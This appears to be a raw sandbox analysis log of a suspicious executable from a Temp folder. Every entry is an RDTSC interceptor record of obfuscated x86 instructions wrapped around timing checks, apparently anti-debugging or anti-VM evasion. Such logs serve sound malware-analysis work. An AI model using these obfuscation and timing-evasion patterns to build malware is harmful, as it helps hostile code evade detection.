Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110341 second address: 5110347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110347 second address: 5110358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD5Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110358 second address: 511035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511035C second address: 511036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511036B second address: 511036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511036F second address: 5110373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110373 second address: 5110379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110379 second address: 511039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD5Ch 0x00000009 adc ch, 00000028h 0x0000000c jmp 00007FC9F53DFD5Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 511039A second address: 51103AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f push edx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51103AC second address: 5110418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD64h 0x00000009 and si, 11B8h 0x0000000e jmp 00007FC9F53DFD5Bh 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC9F53DFD62h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC9F53DFD5Dh 0x0000002a sbb ch, 00000006h 0x0000002d jmp 00007FC9F53DFD61h 0x00000032 popfd 0x00000033 push eax 0x00000034 pop edx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512031E second address: 5120322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120322 second address: 5120328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120328 second address: 51203BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC9F53C6A85h 0x00000013 or ax, 7476h 0x00000018 jmp 00007FC9F53C6A81h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ax, 5B03h 0x00000026 pushfd 0x00000027 jmp 00007FC9F53C6A88h 0x0000002c xor ax, 78C8h 0x00000031 jmp 00007FC9F53C6A7Bh 0x00000036 popfd 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov ah, bh 0x0000003e pushfd 0x0000003f jmp 00007FC9F53C6A7Ch 0x00000044 adc cx, FB28h 0x00000049 jmp 00007FC9F53C6A7Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51203BA second address: 51203C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51203C0 second address: 51203C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51203C4 second address: 51203C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130513 second address: 5130535 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC9F53C6A86h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130535 second address: 513053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513053A second address: 513054E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A80h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513054E second address: 513060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC9F53DFD5Dh 0x00000012 sub cx, C6A6h 0x00000017 jmp 00007FC9F53DFD61h 0x0000001c popfd 0x0000001d mov cx, 49D7h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 mov esi, 07389CCFh 0x0000002a pushfd 0x0000002b jmp 00007FC9F53DFD64h 0x00000030 or cx, 3778h 0x00000035 jmp 00007FC9F53DFD5Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [ebp+08h] 0x0000003f pushad 0x00000040 mov ebx, eax 0x00000042 push eax 0x00000043 mov cl, bh 0x00000045 pop esi 0x00000046 popad 0x00000047 and dword ptr [eax], 00000000h 0x0000004a pushad 0x0000004b call 00007FC9F53DFD65h 0x00000050 jmp 00007FC9F53DFD60h 0x00000055 pop esi 0x00000056 jmp 00007FC9F53DFD5Bh 0x0000005b popad 0x0000005c and dword ptr [eax+04h], 00000000h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FC9F53DFD65h 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513060F second address: 513061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513061F second address: 5130623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130623 second address: 5130637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e mov eax, 3431705Bh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130637 second address: 5130647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51300FA second address: 51300FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51300FF second address: 513012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC9F53DFD66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 513012B second address: 5130131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130131 second address: 5130177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, 4Ah 0x0000000e pushfd 0x0000000f jmp 00007FC9F53DFD67h 0x00000014 add ax, 200Eh 0x00000019 jmp 00007FC9F53DFD69h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5130177 second address: 5130187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A7Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51303EE second address: 5130421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f popad 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC9F53DFD5Ch 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505BE second address: 51505C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505C2 second address: 51505C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505C8 second address: 51505DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A81h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51505DD second address: 515063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, BAA3h 0x00000011 mov ah, 5Dh 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FC9F53DFD62h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FC9F53DFD60h 0x00000020 mov ebp, esp 0x00000022 jmp 00007FC9F53DFD60h 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov ax, bx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 515063B second address: 5150641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150641 second address: 5150645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150645 second address: 5150714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f pushfd 0x00000010 jmp 00007FC9F53C6A7Bh 0x00000015 xor ch, FFFFFFEEh 0x00000018 jmp 00007FC9F53C6A89h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FC9F53C6A7Eh 0x00000025 mov eax, dword ptr [76FA65FCh] 0x0000002a jmp 00007FC9F53C6A80h 0x0000002f test eax, eax 0x00000031 jmp 00007FC9F53C6A80h 0x00000036 je 00007FCA67199D16h 0x0000003c jmp 00007FC9F53C6A80h 0x00000041 mov ecx, eax 0x00000043 jmp 00007FC9F53C6A80h 0x00000048 xor eax, dword ptr [ebp+08h] 0x0000004b jmp 00007FC9F53C6A81h 0x00000050 and ecx, 1Fh 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FC9F53C6A7Dh 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150714 second address: 515075A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC9F53DFD5Ch 0x00000012 or cx, 8EE8h 0x00000017 jmp 00007FC9F53DFD5Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov dx, D78Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov si, AE65h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 515075A second address: 5150761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 89h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5150761 second address: 515079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00B02014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007FC9F9A704F1h 0x00000022 push FFFFFFFEh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC9F53DFD5Bh 0x0000002d sbb ecx, 0E36138Eh 0x00000033 jmp 00007FC9F53DFD69h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100040 second address: 5100046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100046 second address: 510009A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FC9F53DFD5Bh 0x00000017 and ax, 930Eh 0x0000001c jmp 00007FC9F53DFD69h 0x00000021 popfd 0x00000022 call 00007FC9F53DFD60h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510009A second address: 51000A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000A0 second address: 51000A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000A4 second address: 51000BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000BB second address: 51000F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC9F53DFD5Fh 0x0000000a sub ah, 0000007Eh 0x0000000d jmp 00007FC9F53DFD69h 0x00000012 popfd 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51000F6 second address: 5100109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100109 second address: 5100129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD63h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100129 second address: 5100141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100141 second address: 5100145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100145 second address: 51001AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b jmp 00007FC9F53C6A87h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 pushad 0x00000015 push esi 0x00000016 pop edi 0x00000017 mov ecx, 72773529h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FC9F53C6A7Fh 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 mov edx, esi 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b mov ebx, dword ptr [ebp+10h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC9F53C6A89h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001AA second address: 51001B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001B0 second address: 51001B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001B4 second address: 51001B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51001B8 second address: 5100216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC9F53C6A84h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov esi, 34592DCDh 0x00000017 jmp 00007FC9F53C6A7Ah 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC9F53C6A7Dh 0x00000029 and eax, 0DE42256h 0x0000002f jmp 00007FC9F53C6A81h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100216 second address: 510022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510022D second address: 5100231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100231 second address: 5100235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100235 second address: 510023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510023B second address: 510024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD5Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510024A second address: 5100265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53C6A7Eh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100265 second address: 5100269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100269 second address: 510026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510026F second address: 5100374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC9F53DFD5Ch 0x00000012 xor cx, 3868h 0x00000017 jmp 00007FC9F53DFD5Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC9F53DFD68h 0x00000023 add al, FFFFFFC8h 0x00000026 jmp 00007FC9F53DFD5Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FC9F53DFD66h 0x00000034 and cx, 8D28h 0x00000039 jmp 00007FC9F53DFD5Bh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FC9F53DFD68h 0x00000045 sbb esi, 3787BF88h 0x0000004b jmp 00007FC9F53DFD5Bh 0x00000050 popfd 0x00000051 popad 0x00000052 popad 0x00000053 test esi, esi 0x00000055 jmp 00007FC9F53DFD66h 0x0000005a je 00007FCA671FE032h 0x00000060 pushad 0x00000061 call 00007FC9F53DFD5Eh 0x00000066 movzx esi, di 0x00000069 pop edx 0x0000006a jmp 00007FC9F53DFD5Ch 0x0000006f popad 0x00000070 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC9F53DFD5Ah 0x00000080 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100374 second address: 5100378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100378 second address: 510037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510037E second address: 5100452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCA671E4D11h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC9F53C6A7Eh 0x00000016 adc cx, D9D8h 0x0000001b jmp 00007FC9F53C6A7Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FC9F53C6A88h 0x00000027 jmp 00007FC9F53C6A85h 0x0000002c popfd 0x0000002d popad 0x0000002e mov edx, dword ptr [esi+44h] 0x00000031 jmp 00007FC9F53C6A7Eh 0x00000036 or edx, dword ptr [ebp+0Ch] 0x00000039 jmp 00007FC9F53C6A80h 0x0000003e test edx, 61000000h 0x00000044 pushad 0x00000045 pushad 0x00000046 mov ecx, 5FB00FE3h 0x0000004b call 00007FC9F53C6A88h 0x00000050 pop esi 0x00000051 popad 0x00000052 movsx edi, cx 0x00000055 popad 0x00000056 jne 00007FCA671E4CC8h 0x0000005c jmp 00007FC9F53C6A7Ah 0x00000061 test byte ptr [esi+48h], 00000001h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 mov cx, 400Fh 0x0000006c popad 0x0000006d rdtsc
